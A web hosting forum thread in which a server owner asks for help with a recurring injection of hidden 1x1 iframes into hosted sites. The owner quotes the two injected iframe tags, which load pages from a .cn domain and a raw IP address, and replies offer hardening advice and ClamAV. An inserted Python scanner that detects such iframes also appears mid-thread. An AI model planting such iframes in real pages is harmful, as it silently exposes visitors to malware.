I have big problem with code

adamp

Verified User
Joined
Jan 11, 2007
Messages
137
Hello,
I have a DA server.
I have a phenomenon that repeats itself all the time: this code enters and installs itself in the sites' code.

This is the code:

Code:
<iframe src='http://updateservernet.cn/tank.php' width='1' height='1' style='visibility: hidden;'></iframe>

I go to this link
http://updateservernet.cn and on the server install DA

In the past this code was different, it was like that:

Code:
<iframe src='http://78.109.21.114/t.php' width='1' height='1' style='visibility: hidden;'></iframe>

When people enter the sites, their computer identifies a virus and the computer is blew.


Can someone help, and does anyone know what the problem is?
 
Hope you are not hit by the Random JavaScript Rootkit. Read this article for more information: http://servertune.com/kbase/entry/258/
 

There is no proof that this trojan/virus is affecting any server types (control panel) outside of a cPanel server. I've yet to see any other control panel affected by the trojan as stated on your site. This is probably why you have not seen any incidence of this trojan reported here on the DA forums, and I haven't seen it reported on Plesk, Ensim or any other panel other than cPanel.

I can't say for sure if the original poster here is really running a DA box or if he's really infected with the same trojan.

Also, there are no reports of the JavaScript Trojan affecting FreeBSD servers. They seem to be immune to these attacks since the kernels between the two system types are very different.
 

And what can I do with this?
 
Since your sites are injected with JavaScript IFRame code, you need to do the following:

1. Scan and remove all files infected with this code. We have our own scripts to scan and disinfect files with JS code; sorry, but we are not making these scripts available to the public at this time.

2. Right after the files are disinfected, you must secure and harden your server to prevent future injection with the JS code.

3. DO NOT give shell or jailshell access to ANYONE.

4. Update your server’s applications and services to the latest release, especially security patches and monitor the server closely for any unsuspected activity.

If you don't know how to do these things, you can seek professional help. Good luck.
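As an illustration of the scanning half of step 1, the sketch below is an added example, not the poster's private scripts or code from this thread. It walks a web root and reports invisible iframes that load from a remote host, the pattern shown in the first post; the extension list, the function names and the sample hosts are assumptions, and it only reports so that hits can be reviewed before any file is cleaned.

```python
import os
import re
import tempfile
from urllib.parse import urlparse

WEB_EXTS = {".php", ".html", ".htm", ".js", ".tpl", ".inc"}  # assumed set; adjust per site
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s>]+))""")

def suspicious_iframes(text):
    """Return (line, host) for every invisible iframe whose src is a remote host."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        attrs = {k.lower(): a or b or c for k, a, b, c in ATTR_RE.findall(m.group(0))}
        style = attrs.get("style", "").replace(" ", "").lower()
        tiny = all(attrs.get(d, "").strip().rstrip("px") in ("0", "1")
                   for d in ("width", "height"))
        hidden = "visibility:hidden" in style or "display:none" in style
        host = urlparse(attrs.get("src", "")).netloc  # empty for relative/local src
        if host and (tiny or hidden):
            hits.append((text.count("\n", 0, m.start()) + 1, host))
    return hits

def scan_tree(root):
    """Walk a web root and report (path, line, host); files are never modified."""
    report = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if os.path.splitext(name)[1].lower() not in WEB_EXTS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                report += [(path, ln, host) for ln, host in suspicious_iframes(fh.read())]
    return report

def demo():
    """Constructed sample tree: one injected page and one clean page."""
    injected = ("<html><body>Welcome</body></html>\n"
                "<iframe src='http://injected.example/t.php' width='1' height='1' "
                "style='visibility: hidden;'></iframe>\n")
    clean = ('<iframe src="http://video.example/embed/1" width="560" height="315"></iframe>\n'
             '<iframe src="/local/frame.html" style="display:none"></iframe>\n')
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("index.php", injected), ("about.html", clean)):
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return [(os.path.basename(p), ln, host) for p, ln, host in scan_tree(root)]

if __name__ == "__main__":
    print(demo())
```

Grouping the reported hosts across all accounts shows whether every site carries the same injected source, and re-running the scan after cleanup shows whether the files are being rewritten.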
 
Please, discard that response. Since your sites are injected with JavaScript IFRame code, you need to do the following:

1. Scan and remove all files infected with this code. We have our own scripts to scan and disinfect files with JS code; sorry, but we are not making these scripts public at this time.

2. Right after the files are disinfected, you must secure and harden your server to prevent future injection with the JS code.

3. DO NOT give shell or jailshell access to ANYONE.

4. Update your server’s applications and services to the latest release, especially security patches and monitor the server closely for any unsuspected activity.

If you don't know how to do these things, you can seek professional help. Good luck.

Can you give me the scripts that scan and remove, and tell me please how I can secure the server?

My server is updated all the time.
 
adamp,

He already said he wouldn't make his scripts public, in paragraph 1.

Jeff
 
I'm having the same problem, and my hosting is shared hosting. I have found the script and deleted it; unfortunately it keeps on coming back. Is the hosting company's server infected? Does anyone know how they are able to keep on doing this?
 

ClamAV can scan and remove infected files.
 